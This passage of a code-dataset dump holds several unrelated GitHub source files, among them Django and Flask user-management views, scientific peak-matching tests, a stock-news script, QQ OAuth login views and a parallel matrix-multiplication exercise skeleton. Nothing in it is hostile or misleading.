UN SUPER USUARIO\n@receiver(pre_save, sender=User)\ndef update_is_staff(sender, instance, **kwargs):\n if instance.roles and instance.roles.nombre == 'admin':\n instance.is_staff = True\n else:\n instance.is_staff = False\n\n\n","repo_name":"arizonv/Api-Portafolio","sub_path":"accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6412,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"38976401879","text":"# Tests for compare_to_database.py\n\nfrom Code.compare_to_database import CompareToDatabase\nfrom Code.peak import Peak\nfrom unittest import mock\n\n@mock.patch.object(CompareToDatabase, \"_match_xrd\")\ndef test_match_xrd(mock):\n\tCompareToDatabase(\"xrd\").match()\n\tmock.assert_called()\n\n@mock.patch.object(CompareToDatabase, \"_match_ftir\")\ndef test_match_ftir(mock):\n\tCompareToDatabase(\"ftir\").match()\n\tmock.assert_called()\n\n@mock.patch.object(CompareToDatabase, \"_match_ftir\")\n@mock.patch.object(CompareToDatabase, \"_match_xrd\")\ndef test_match_none(mock_xrd, mock_ftir):\n\tCompareToDatabase().match()\n\tmock_xrd.assert_not_called()\n\tmock_ftir.assert_not_called()\n\n@mock.patch.object(CompareToDatabase, \"_match_ftir\")\n@mock.patch.object(CompareToDatabase, \"_match_xrd\")\ndef test_match_random(mock_xrd, mock_ftir):\n\tCompareToDatabase(\"random string\").match()\n\tmock_xrd.assert_not_called()\n\tmock_ftir.assert_not_called()\n\ndef test_match_xrd_anilite():\n\t# Entry in database:\n\t# 46.28,100,32.29,65,27.86,57,Anilite,Cu7S4\n\tpeaks = [\n\t\tPeak(None,46.27,100,None),\n\t\tPeak(None,99.22,56,None),\n\t\tPeak(None,10,20,None),\n\t\tPeak(None,32.29,65,None),\n\t\tPeak(None,111.5845225,30.333,None),\n\t\tPeak(None,27.86,57,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match[\"material_name\"] == \"Anilite\")\n\ndef test_xrd_no_match():\n\t# Entry in database to *not* match:\n\t# 46.28,100,32.29,65,27.86,57,Anilite,Cu7S4\n\tpeaks = [\n\t\tPeak(None,46.28,10,None),\n\t\tPeak(None,99.22,100,None),\n\t\tPeak(None,10,20,None),\n\t\tPeak(None,32.29,65,None),\n\t\tPeak(None,111.5845225,30.333,None),\n\t\tPeak(None,27.86,57,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match == None)\n\ndef test_match_xrd_equal_intensity_peaks():\n\t# Entry in database:\n\t# 164.92,100,29.76,100,155.65,100,Bowieite,\"(Rh,Ir,Pt)1.77S3\"\n\tpeaks = [\n\t\tPeak(None,46.28,10,None),\n\t\tPeak(None,155.65,100,None),\n\t\tPeak(None,29.76,100,None),\n\t\tPeak(None,32.29,65,None),\n\t\tPeak(None,164.92,100,None),\n\t\tPeak(None,27.86,57,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match[\"material_name\"] == \"Bowieite\")\n\ndef test_match_xrd_barahonaite_al():\n\t# Entry in database:\n\t# 4.01,100,7.92,70,17.79,50,Barahonaite-(Al),\"(Ca,Cu,Na,Fe+++,Al )12Al2(AsO4)8(OH,Cl)x•nH2O\"\n\tpeaks = [\n\t\tPeak(None,17.79,51,None),\n\t\tPeak(None,4.05,100,None),\n\t\tPeak(None,7.92,69,None),\n\t\tPeak(None,32.29,48,None),\n\t\tPeak(None,164.92,22,None),\n\t\tPeak(None,27.86,12,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match[\"material_name\"] == \"Barahonaite-(Al)\")\n\ndef test_xrd_no_peaks():\n\tpeaks = []\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match == None)\n\ndef test_xrd_only_one_peak():\n\tpeaks = [\n\t\tPeak(None,16.99,100,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match == None)\n\ndef test_xrd_only_2_peaks():\n\tpeaks = 
[\n\t\tPeak(None,16.99,100,None),\n\t\tPeak(None,6.90,10,None),\n\t]\n\tmatch = CompareToDatabase(\"xrd\", peaks).match()\n\tassert(match == None)\n\ndef test_match_ftir_nitrile_rubber():\n\t# Entry in database:\n\t# nitrile rubber,Primpke et al. 2018,966.3,1435.0,2924.1,1.0,0.9508345,0.37627639\n\tpeaks = [\n\t\tPeak(None,966.3,1.0,None),\n\t\tPeak(None,262.5,0.103,None),\n\t\tPeak(None,1435.0,0.9508345,None),\n\t\tPeak(None,120.6,0.12,None),\n\t\tPeak(None,2914.4,0.25,None),\n\t\tPeak(None,2924.1,0.37627639,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match[\"name\"] == \"nitrile rubber\")\n\ndef test_match_ftir_no_match():\n\t# Entry in database:\n\t# nitrile rubber,Primpke et al. 2018,966.3,1435.0,2924.1,1.0,0.9508345,0.3762763\n\tpeaks = [\n\tPeak(None,3000.1,1.0,None),\n\t\tPeak(None,262.5,0.103,None),\n\t\tPeak(None,2500,0.9508345,None),\n\t\tPeak(None,120.6,0.12,None),\n\t\tPeak(None,2914.4,0.25,None),\n\t\tPeak(None,4000,0.37627639,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match == None)\n\ndef test_match_ftir_silicone_rubber():\n\t# Entry in database:\n\t# silicone rubber,Primpke et al. 2018,785.0,1006.8,1064.7,1.0,0.8293072,0.4721336\n\tpeaks = [\n\t\tPeak(None,1064.7,0.4721336,None),\n\t\tPeak(None,384.5,0.2821336,None),\n\t\tPeak(None,150.6,0.2569874,None),\n\t\tPeak(None,1006.8,0.8293072,None),\n\t\tPeak(None,785.0,1.0,None),\n\t\tPeak(None,585.4,0.1721336,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match[\"name\"] == \"silicone rubber\")\n\n\ndef test_ftir_no_peaks():\n\tpeaks = []\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match == None)\n\ndef test_ftir_only_one_peak():\n\tpeaks = [\n\t\tPeak(None,1542.1,1.0,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match == None)\n\ndef test_ftir_only_2_peaks():\n\tpeaks = [\n\t\tPeak(None,1425.5,1.0,None),\n\t\tPeak(None,1543.8,1.0,None),\n\t]\n\tmatch = CompareToDatabase(\"ftir\", peaks).match()\n\tassert(match == None)","repo_name":"AnitaZhang0526/APC_FinalProject","sub_path":"Tests/compare_to_database_test.py","file_name":"compare_to_database_test.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"126945680","text":"import app\nfrom app import login_manager\nfrom flask import current_app, url_for, Blueprint, render_template, redirect, session, abort\nfrom flask_login import login_required, logout_user, login_user, current_user\nfrom flask_principal import Identity, AnonymousIdentity, identity_loaded, RoleNeed, UserNeed, identity_changed\nfrom app.usuarios.models import Usuarios, Cargos\nfrom app.usuarios.forms import UsuarioForm, CargoForm\nfrom app import administrador, atendente, gerente, governanca\n\nusuarios_bp = Blueprint('usuarios_bp', __name__, template_folder='templates', static_folder='static', url_prefix='/usuarios')\ncargos_bp = Blueprint('cargos_bp', __name__, template_folder='templates', static_folder='static', url_prefix='/cargos')\n\n@usuarios_bp.route('/dashboard', methods=['GET',])\ndef usuarios():\n\t\n\tusuarios =\tUsuarios.get()\n\n\treturn render_template('lista_usuarios.html', title=\"Usuários\", usuarios=usuarios,\n\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n\n@usuarios_bp.route('/adicionar', methods=['GET', 'POST'])\n@usuarios_bp.route('/editar/', methods=['GET', 
'POST'])\ndef editar_usuarios(id=None):\n\t\n\tform =\tUsuarioForm(id)\n\taviso = None\n\tif form.validate_on_submit():\n\t\tform.salvar()\n\t\tif not form.verificacao_senha:\n\t\t\taviso =\t'Senha e Confirmar senha não coincidem. Por favor tente novamente.'\n\t\t\treturn render_template('editar_usuarios.html', title='Editar usuário', form=form, aviso=aviso,\n\t\t\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n\t\t\n\t\treturn redirect( url_for('usuarios_bp.usuarios') )\n\t\n\treturn render_template('editar_usuarios.html', title='Editar usuário', form=form,\n\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n\n@cargos_bp.route('/dashboard', methods=['GET',])\ndef cargos():\n\t\n\tcargos =\tCargos.get()\n\n\treturn render_template('lista_cargos.html', title=\"Usuários\", cargos=cargos,\n\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n\n@cargos_bp.route('/adicionar', methods=['GET', 'POST'])\n@cargos_bp.route('/editar/', methods=['GET', 'POST'])\ndef editar_cargos(id=None):\n\t\n\tform =\tCargoForm(id)\n\t\n\tif form.validate_on_submit():\n\t\tform.salvar()\n\t\treturn redirect( url_for('cargos_bp.cargos') )\n\t\n\treturn render_template('editar_cargos.html', title='Editar usuário', form=form,\n\t\tadm=administrador.can(), atendente=atendente.can(), gerente=gerente.can(), governanca=governanca.can(), usuario=current_user)\n","repo_name":"rrhofs/SGH_ITI","sub_path":"app/usuarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71105533684","text":"import requests\nimport logging\nimport logging.config\nimport sys\nimport os\nimport re\nimport json\nfrom .validator import Validator\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../\"))\nimport common.vars as variables\nimport store.store_api as store_api\n\n\nclass BookRequesterException(Exception):\n pass\n\n\nclass BookRequester:\n def __init__(self):\n self.logger = logging.getLogger(\"BookRequester\")\n self.logger.info(\"Creating the BookRequester\")\n self.validators = {}\n db = store_api.StoreApi()\n platforms = db.get_platforms()\n for platform in platforms:\n self.validators[platform[\"_id\"]] = Validator(platform)\n\n def request_book(self, book_url, platform=None, force_request=False):\n self.logger.info(\"Requesting a book\")\n self.logger.debug(f\"book_url: {book_url}, platform: {platform}\")\n validator = self.validators.get(platform)\n db = store_api.StoreApi()\n if validator is None:\n self.logger.debug(f\"book_url: {book_url}, validator is None\")\n platforms = [p[\"_id\"] for p in db.get_platforms()]\n if platform is not None:\n self.logger.debug(f\"book_url: {book_url}, platform is not None\")\n if platform not in platforms:\n ex = BookRequesterException(f\"book_url: {book_url}, there is no such platform {platform}\")\n self.logger.exception(ex)\n raise ex\n validator = Validator(platform)\n self.validators[platform] = validator\n else:\n self.logger.debug(f\"book_url: {book_url}, platform is None\")\n for p in platforms:\n regexp = db.get_platform_validation_regexp(p)\n url = re.search(regexp, book_url)\n if url is not None:\n self.logger.debug(f\"book_url: {book_url}, regexp: {regexp}, url: {url.group(0)}\")\n platform = p\n 
self.logger.debug(f\"book_url: {book_url}, platform {platform} is found\")\n break\n else:\n self.logger.debug(f\"book_url: {book_url}, regexp: {regexp}, url: {url}\")\n\n if platform is None:\n ex = BookRequesterException(f\"There is no platform for book url {book_url}\")\n self.logger.warning(ex)\n raise ex\n validator = self.validators.get(platform)\n if validator is None:\n validator = Validator(platform)\n self.validators[platform] = validator\n else:\n self.logger.debug(f\"book_url: {book_url}, validator is not None\")\n regexp = db.get_platform_validation_regexp(platform)\n url_group = re.search(regexp, book_url)\n\n if url_group is None:\n self.logger.debug(f\"book_url: {book_url}, platform: {platform}, regexp: {regexp}, url: {url_group}\")\n self.logger.debug(f\"book_url: {book_url}, url is None\")\n ex = BookRequesterException(f\"The URL {book_url} is not validated with validation regexp {regexp}\")\n self.logger.exception(ex)\n raise ex\n url = url_group.group(0)\n self.logger.debug(f\"book_url: {book_url}, platform: {platform}, regexp: {regexp}, url: {url}\")\n if not force_request:\n self.logger.info(\"Trying to get the book from DB\")\n book = db.get_book({\"book_url\": url})\n self.logger.debug(f\"book_url: {url}, book: {book}\")\n if book is not None:\n self.logger.info(f\"Returning a book: {book} from DB\")\n return book\n try:\n resp = requests.get(url)\n except requests.exceptions.MissingSchema as ex:\n self.logger.debug(f\"book_url: {book_url}: Missed http schema. Automatically add 'https://' to url and retry.\")\n url = \"https://\" + url\n resp = requests.get(url)\n\n new_book_url = resp.url\n self.logger.debug(f\"book_url: {book_url}, response status: {resp.status_code}, new_book_url: {new_book_url}\")\n\n if not force_request:\n self.logger.info(\"Trying to get the book from DB\")\n book = db.get_book({\"book_url\": new_book_url})\n self.logger.debug(f\"book_url: {new_book_url}, book: {book}\")\n if book is not None:\n self.logger.info(f\"Returning a book: {book} from DB\")\n return book\n\n if validator.validate_book(resp):\n book_info = validator.get_book_info(resp)\n book_info[\"book_url\"] = new_book_url\n book_info[\"platform\"] = platform\n self.logger.debug(f\"book_url: {new_book_url}, book_info: {str(book_info)}\")\n return book_info\n else:\n self.logger.debug(f\"book_url: {new_book_url}, book_info returned from validator is None\")\n return None\n\n\nif __name__ == \"__main__\":\n with open(variables.LOGGING_CONF_FILE_PATH, \"r\") as f:\n conf_dict = json.load(f)\n logging.config.dictConfig(conf_dict)","repo_name":"GoCodingIcreated/newspapper","sub_path":"alert/book_requesters/requester.py","file_name":"requester.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12837752585","text":"import requests\nimport os\n\nSTOCK = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\n\n## STEP 1: Use https://www.alphavantage.co\n# When STOCK price increase/decreases by 5% between yesterday and the day before yesterday then print(\"Get News\").\n\nstock_api_params = {\n \"function\": \"TIME_SERIES_DAILY\",\n \"symbol\": \"TSLA\",\n \"outputsize\": \"compact\",\n \"apikey\": os.environ.get(\"ALPHAVANTAGE_API_KEY\")\n}\n\nstock_api_fetch = requests.get(url=\"https://www.alphavantage.co/query\", params=stock_api_params)\nstock_api_fetch.raise_for_status()\n\nfull_data = stock_api_fetch.json()[\"Time Series (Daily)\"]\nfull_data_list = list(stock_api_fetch.json()[\"Time Series 
(Daily)\"].items())\n\nyesterday_data = full_data_list[0]\nday_before_yesterday_data = full_data_list[1]\n\nyesterday_price = float(yesterday_data[1][\"4. close\"])\nday_before_yesterday_price = float(day_before_yesterday_data[1][\"4. close\"])\n\n\n## STEP 2: Use https://newsapi.org\n# Instead of printing (\"Get News\"), actually get the first 3 news pieces for the COMPANY_NAME. \nnewsapi_param = {\n \"qInTitle\": \"TSLA\",\n \"from\": day_before_yesterday_data[0],\n \"sortBy\": \"popularity\",\n \"apiKey\": os.environ.get(\"NEWSAPI_KEY\"),\n \"language\": \"en\",\n}\n\nnewsapi_fetch = requests.get(url=\"https://newsapi.org/v2/everything\", params=newsapi_param)\nnewsapi_fetch.raise_for_status()\nfull_news_data = newsapi_fetch.json()\n\nfull_news_list = list(newsapi_fetch.json().items())\narticles, article_data = full_news_list[2]\n\ntop_3_news = {\n count: {\n \"title\": article[\"title\"],\n \"description\": article[\"description\"],\n }\n for count, article in enumerate(article_data[:3])}\n\ntsla_price_change = (yesterday_price - day_before_yesterday_price) / day_before_yesterday_price\n\nif tsla_price_change >= 0.05:\n print(f\"TSLA: 🔺{round(tsla_price_change*100,2)}%\\n\")\n for i in range(0, 3):\n print(f\"Headline {i+1}: {top_3_news[i]['title']}\")\n print(f\"Brief {i+1}: {top_3_news[i]['description']}\\n\")\n\nif tsla_price_change <= -0.05:\n print(f\"TSLA: 🔻{round(tsla_price_change*100,2)}%\\n\")\n for i in range(0, 3):\n print(f\"Headline {i+1}: {top_3_news[i]['title']}\")\n print(f\"Brief {i+1}: {top_3_news[i]['description']}\\n\")\n","repo_name":"Noitcani/100_Days_of_Python","sub_path":"Day 36 - Stock News Monitoring App/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6857207464","text":"'''Given a string, return the dictionary of words and number of occurences'''\nfrom pyproblems.utility import is_str\n\ndef word_count(s_param):\n '''Return a dictionary of words with number of occurences of each word'''\n\n if not is_str(s_param):\n raise TypeError(f\"Unsupported Type {type(s_param)}\")\n\n words = s_param.split()\n word_dict = dict()\n\n for word in words:\n if word in word_dict:\n word_dict[word] += 1\n else:\n word_dict[word] = 1\n\n return word_dict\n ","repo_name":"lnarasim/250_problems","sub_path":"pyproblems/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6428235782","text":"from rest_framework import serializers\nfrom .models import Product, Stock\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n stock = serializers.SerializerMethodField()\n\n def get_stock(self, obj):\n try:\n return Stock.objects.get(product_id=obj.id).quantity\n except:\n return -1\n\n class Meta:\n model = Product\n fields = ('id', 'name', 'price', 'stock')\n\n\nclass StockSerializer(serializers.ModelSerializer):\n class Meta:\n model = Stock\n fields = '__all__'\n","repo_name":"wonderblunders/KreditCart","sub_path":"products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1145075710","text":"from datetime import datetime\nfrom django import forms\n\nfrom django.forms import (\n ModelForm,\n CharField,\n TextInput,\n ModelChoiceField,\n 
ModelMultipleChoiceField,\n)\n\nfrom quotes.models import (\n Tag,\n Author,\n Quote,\n User,\n)\n\n\nclass TagForm(ModelForm):\n name = CharField(min_length=3, max_length=25, required=True, widget=TextInput())\n\n class Meta:\n model = Tag\n fields = ['name']\n\n\nclass QuoteForm(ModelForm):\n author = ModelChoiceField(queryset=Author.objects.none()) # noqa\n tags = ModelMultipleChoiceField(queryset=Tag.objects.none()) # noqa\n\n class Meta:\n model = Quote\n fields = ['quote', 'author', 'tags']\n\n def __init__(self, user: User, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['author'].queryset = Author.objects.filter(user=user) # noqa\n self.fields['tags'].queryset = Tag.objects.all() # noqa\n\n\nclass AuthorForm(ModelForm):\n class Meta:\n model = Author\n fields = ['fullname', 'born_date', 'born_location', 'description']\n \n def clean_born_date(self):\n born_date = self.cleaned_data.get('born_date')\n\n # Check if the birth date is in the future\n if born_date and born_date > datetime.date.today():\n raise forms.ValidationError(\"Дата народження не може бути у майбутньому.\")\n\n return born_date","repo_name":"Derangedwerwolf/HomeWorks","sub_path":"Main_Project/main_project/quotes/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16055108324","text":"from random import randint\nfrom multiprocessing import Pool\nimport time\n\n# the single core implementation\ndef matrix_multiplication(m0, m1):\n \"\"\"The following algorithm is exactly how suhak's jungsuk does matrix\n multiplication\"\"\"\n\n # build resulting matrix\n res = [[0 for x in range(len(m0))] for x in range(len(m1))]\n\n # iterate column of lefthand\n for k in range(len(m0[0])):\n # iterate row of lefthand\n for i in range(len(m0)):\n # r = ith row, kth column\n r = m0[i][k]\n for j in range(len(m1)):\n # ith row, jth column of result is summing\n # r * kth row, jth column of righthand\n res[i][j] += (r * m1[k][j])\n return res\n\ndef transposed(m):\n # zip([1,2,3], [3,4,5]) -> [(1,3), (2, 4), (3,5)]\n # just like a zipper, match elements with their corresponding pair\n # equivalent to tranpose, with lengths are equal\n\n # zip(*m) returns the transposed list, but its elements changed to tuples.\n # therefore we change its type to list.\n return [list(r) for r in zip(*m)]\n\ndef f(column):\n # functions used in pool can only accept ONE arguments.\n # Therefore, instead of f(m0, c)\n # we use global a to access the lefthand matrix\n global a\n\n # build resulting column\n result = [0 for x in range(len(a))]\n\n # do a matrix & column multiplication. 
Two nested for loops will suffice.\n # TODO\n\n return result\n\n#BEGINNING OF CODE EXECUTION\n#BEGINNING OF CODE EXECUTION\n#BEGINNING OF CODE EXECUTION\n\n# size of left, right hand matrices\nSIZE = 300\n\n# change DEBUG to True to print the matrices\n# Print when the SIZE is a small number ( < 4?)\nDEBUG = False\n\n# Generate a SIZExSIZE matrix with random numbers\n# lefthand\na = [[randint(-100,100) for _ in range(SIZE)] for _ in range(SIZE)]\n# righthand\nb = [[randint(-100,100) for _ in range(SIZE)] for _ in range(SIZE)]\n\n\nif DEBUG:\n for (r, r2) in zip(a, b):\n print(r,\" \", r2)\n\n\"\"\"MULTICORE\"\"\"\nstart = time.time()\n# initiate a pool\nwith Pool() as p:\n # transpose the righthand matrix so that we can do column-wise access\n ll = transpose(b)\n\n if DEBUG:\n print(\"RIGHT matrix transposed:\")\n for l in ll:\n print(l)\n\n # apply f to elements in l, using parallelization\n # the result would be list of list(columns).\n # We can transpose it back to match the row-wise representation\n tmp = p.map(f, ll)\n\n # transpose back to get the correct result\n ret = transpose(tmp)\n\n end = time.time()\nprint(\"multicore took: \", end - start)\n\n\"\"\"SINGLECORE\"\"\"\n# get the time before the operation\nstart = time.time()\nresult = matrix_multiplication(a, b)\n# get the time after the operation\nend = time.time()\n# the difference between the two becomes the time spent\nprint(\"singlecore took: \", end - start)\n\nif DEBUG:\n print(\"result of singlecore:\")\n for r in result:\n print(r)\n print(\"result of multicore:\")\n for r in ret:\n print(r)\n\n# check that multicore version works correctly\nassert(result == ret)\n","repo_name":"taehioum/python_tutor","sub_path":"lec04_hw/mat_mul_skeleton.py","file_name":"mat_mul_skeleton.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10375477146","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework.response import Response\n\nfrom oauth.utils import generic_access_token\n\n\"\"\"\n1. 获取code\n2. 通过code换取token\n3. 通过token 换取 openid\n\n\"\"\"\n\n\"\"\"\n用户点击 qq 登录按钮的时候,前端应该发送一个 ajax请求,来获取要跳转的url\n这个url 是根据 腾讯的文档来生成的\nGET /oauth/qq/statues/\n\"\"\"\nfrom rest_framework.views import APIView\nfrom QQLoginTool.QQtool import OAuthQQ\nfrom django.conf import settings\n\n# from mall import settings\nclass OauthQQURLView(APIView):\n def get(self,request):\n\n state = '/'\n\n # 1. 
创建oauth对象\n # client_id=None, client_secret=None, redirect_uri=None, state=None\n oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID,\n client_secret=settings.QQ_CLIENT_SECRET,\n redirect_uri=settings.QQ_REDIRECT_URI,\n state=state)\n # 2.调用方法,获取url\n login_url = oauth.get_qq_url()\n # login_url = 'https://graph.qq.com/oauth2.0/authorize?response_type=code&redirect_uri=http%3A%2F%2Fwww.meiduo.site%3A8080%2Foauth_callback.html&state=%2F&client_id=101474184'\n\n return Response({'login_url':login_url})\n\n\n\"\"\"\n前段应该 在用户扫描完成之后,跳转到 http://www.meiduo.site:8080/oauth_callback.html?code=6E2E3F64C34ECFE29222EBC390D29196&state=test\n把code 传递给后端,\n\nGET /oauth/qq/users/?code=xxx\n\n# 1.我们获取到这个code, 通过接口来换去 token\n# 2.有了token,就可以换取 oepnid\n\n\"\"\"\nfrom rest_framework import status\nfrom .models import OAuthQQUser\nfrom .serializers import OauthQQUserSerializer\nclass OauthQQUserView(APIView):\n\n def get(self,request):\n code = request.query_params.get('code')\n if code is None:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n # 1.我们获取到这个code, 通过接口来换去 token\n oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID,\n client_secret=settings.QQ_CLIENT_SECRET,\n redirect_uri=settings.QQ_REDIRECT_URI)\n access_token = oauth.get_access_token(code)\n # 2.有了token,就可以换取 oepnid\n openid = oauth.get_open_id(access_token)\n\n # 3. 我们需要根据openid来进行判断\n # 如果数据库中 有openid 则表明用户已经绑定过了\n # 如果数据库中 没有openid 则表明用户没有绑定过,已改显示绑定界面\n\n try:\n qquser = OAuthQQUser.objects.get(openid=openid)\n except OAuthQQUser.DoesNotExist:\n # 说明没有绑定过\n \"\"\"\n 1. 需要对敏感数据进行处理\n 2.数据还需要一个有效期\n \"\"\"\n\n # 我们需要对 openid进行处理\n openid = generic_access_token(openid)\n\n return Response({'access_token':openid})\n\n else:\n # 说明存在, 用户已经绑定过来了,绑定过应该登录\n # 既然是登录,则应该返回token\n # 没有异常 走else\n\n from rest_framework_jwt.settings import api_settings\n\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\n\n payload = jwt_payload_handler(qquser.user)\n token = jwt_encode_handler(payload)\n\n return Response({\n 'user_id':qquser.user.id,\n 'username':qquser.user.username,\n 'token':token,\n })\n\n \"\"\"\n 用户点击绑定按钮的时候,前端应该将 手机号,密码,openid,sms_code 发送给后端\n\n 1. 接收数据\n 2. 对数据进行校验\n 2.1 校验 openid 和sms_code\n 2.2 判断手机���\n 如果注册过,需要判断 密码是否正确\n 如果没有注册过,创建用户\n 3. 保存数据\n 3.1保存 user 和 openid\n 4. 返回响应\n\n POST\n \"\"\"\n\n def post(self, request):\n\n # 1. 接收数据\n data = request.data\n # 2. 对数据进行校验\n # 2.1 校验 openid 和sms_code\n # 2.2 判断手机号\n # 如果注册过,需要判断 密码是否正确\n # 如果没有注册过,创建用户\n serializer = OauthQQUserSerializer(data = data)\n serializer.is_valid(raise_exception=True)\n # 3. 保存数据\n qquser = serializer.save()\n\n # 4. 返回响应\n from rest_framework_jwt.settings import api_settings\n\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\n\n payload = jwt_payload_handler(qquser.user)\n token = jwt_encode_handler(payload)\n\n return Response({\n 'user_id': qquser.user.id,\n 'username': qquser.user.username,\n 'token': token,\n })\n\n\n\n\n\n\n\n\n# 加密签名\n# from itsdangerous import JSONWebSignatureSerializer # 错误的\n\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer, BadSignature, SignatureExpired\n\nfrom django.conf import settings\n# 1.创建 序列化器\n# secret_key 秘钥,一般使用工程的 SECRET_KEY\n# expires_in=None 有效期 单位秒\nserializer = Serializer(settings.SECRET_KEY, 3600)\n\n# 2. 
组织 加密数据\ndata = {'openid': '1234567890'}\n\n# 3.进行加密处理\ntoken = serializer.dumps(data)\n\n\"\"\"\neyJpYXQiOjE1NDE2ODEwNjAsImV4cCI6MTU0MTY4NDY2MCwiYWxnIjoiSFMyNTYifQ.\neyJvcGVuaWQiOiIxMjM0NTY3ODkwIn0.\nmIOKBa9hiOsiHS0sZUqo3hmFXyj2OZrYTt9f6Kk9FCE'\n\n\"\"\"\n# 4.对数据进行解密\nserializer.loads(token)\n\n#5.有效期\nserializer = Serializer(settings.SECRET_KEY,1)\n\n\ndata = {'openid':'1234567890'}\n\ntoken = serializer.dumps(data)\n\n\nserializer.loads(token)\n\n","repo_name":"GODsdgg/Django-","sub_path":"mall/apps/oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18033934124","text":"from odoo import api, models\n\n\nclass AccountMoveLine(models.Model):\n _inherit = \"account.move.line\"\n\n @api.multi\n def create_analytic_lines(self):\n new_lines = self.env['account.move.line']\n valid_list = ['Income', 'Expense', 'Cost', 'Revenue']\n for line in self:\n for valid in valid_list:\n if (line.account_id and\n valid in line.account_id.user_type_id.name):\n new_lines += line\n break\n return super(AccountMoveLine, new_lines).create_analytic_lines()\n","repo_name":"ForgeFlow/eficent-odoo-addons","sub_path":"account_analytic_post_by_type/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"76"} +{"seq_id":"70251723767","text":"############################################## graphic/image paths #################################################\nEASY_PREVIEW_IMAGE_PATH = 'resources/difficulty_previews/easy_preview.png'\nMEDIUM_PREVIEW_IMAGE_PATH = 'resources/difficulty_previews/medium_preview.png'\nDIFFICULT_PREVIEW_IMAGE_PATH = 'resources/difficulty_previews/difficult_preview.png'\nPREVIEW_IMAGE_PATHS = [EASY_PREVIEW_IMAGE_PATH, MEDIUM_PREVIEW_IMAGE_PATH, DIFFICULT_PREVIEW_IMAGE_PATH]\n\n################################################# widgets texts ####################################################\nLABEL_TEXT = [\"Va rugam sa selectati dificultatea dorita\", \"Please select the desired difficulty\", \"Por favor eligas la dificultad\"]\nRADIO_BUTTON0_TEXT = [\"Vreau doar sa ma relaxez\", \"Just wanna relax :)\", \"Solo quiero relajar\"]\nRADIO_BUTTON1_TEXT = [\"Dificultate normala\", \"I'll go for normal, thanks!\", \"Normal es bastante por ahora\"]\nRADIO_BUTTON2_TEXT = [\" Doresc o durere de cap...\", \" I'm so looking for a headache...\", \" Quiero que me duela la cabeza...\"]\nHEURISTIC_BUTTON0_TEXT = [\"Euristica Manhattan\", \"Manhattan heuristic\", \"La heuristica Manhattan\"]\nHEURISTIC_BUTTON1_TEXT = [\"Euristica Euclideana\", \"Euclidean heuristic\", \"La heuristica Euclidean\"]\nHEURISTIC_BUTTON2_TEXT = [\"Euristica Chebyshev\", \"Chebyshev heuristic\", \"La heuristica Chebyshev\"]\nHEURISTIC_BUTTON3_TEXT = [\"Euristica Octile\", \"Octile heuristic\", \"La heuristica Octile\"]\nBUTTON_TEXT = [\"Incepeti jocul\", \"Start game\", \"Empieza el juego\"]\n\n###################################################### color 